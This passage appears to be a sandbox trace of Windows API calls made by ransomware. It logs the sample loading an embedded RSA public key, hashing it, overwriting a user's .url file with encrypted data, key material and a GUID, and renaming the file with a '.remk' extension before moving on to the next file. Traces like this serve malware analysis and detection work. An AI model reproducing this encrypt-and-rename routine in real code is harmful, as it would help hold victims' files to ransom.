Size=0x30) returned 0x31a8a58 [0234.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.064] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.064] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0234.064] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.064] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.064] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.064] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.066] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.066] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.066] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.066] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.066] GetLastError () returned 0x0 [0234.066] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.066] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.066] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.066] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.066] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.066] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbdf8 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5c8 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbe40 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5e0 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee610 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee670 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee628 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.067] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee610 | out: hHeap=0x630000) returned 1 [0234.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee628 | out: hHeap=0x630000) returned 1 [0234.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee670 | out: hHeap=0x630000) returned 1 [0234.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee670 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee628 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee610 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee628 | out: hHeap=0x630000) returned 1 [0234.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee610 | out: hHeap=0x630000) returned 1 [0234.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee670 | out: hHeap=0x630000) returned 1 [0234.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.068] GetCurrentThreadId () returned 0x314 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c28c0 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.069] GetCurrentThreadId () returned 0x314 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee670 [0234.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee610 [0234.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee628 [0234.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5f8 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee688 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee658 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee640 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee6a0 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee640 | out: hHeap=0x630000) returned 1 [0234.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee640 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee658 | out: hHeap=0x630000) returned 1 [0234.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee610 | out: hHeap=0x630000) returned 1 [0234.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee610 [0234.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee670 | out: hHeap=0x630000) returned 1 [0234.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee610 | out: hHeap=0x630000) returned 1 [0234.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee640 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee628 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5f8 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5e0 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bbe40 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.074] WriteFile (in: hFile=0x640, lpBuffer=0x65e698*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x65e698*, lpNumberOfBytesWritten=0x3adfb14*=0x80, lpOverlapped=0x0) returned 1 [0234.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0234.074] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.074] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.075] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.075] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.075] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.075] CloseHandle (hObject=0x640) returned 1 [0234.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0234.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0234.078] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.remk")) returned 1 [0234.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.079] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0234.081] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0234.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.081] PathFindExtensionW 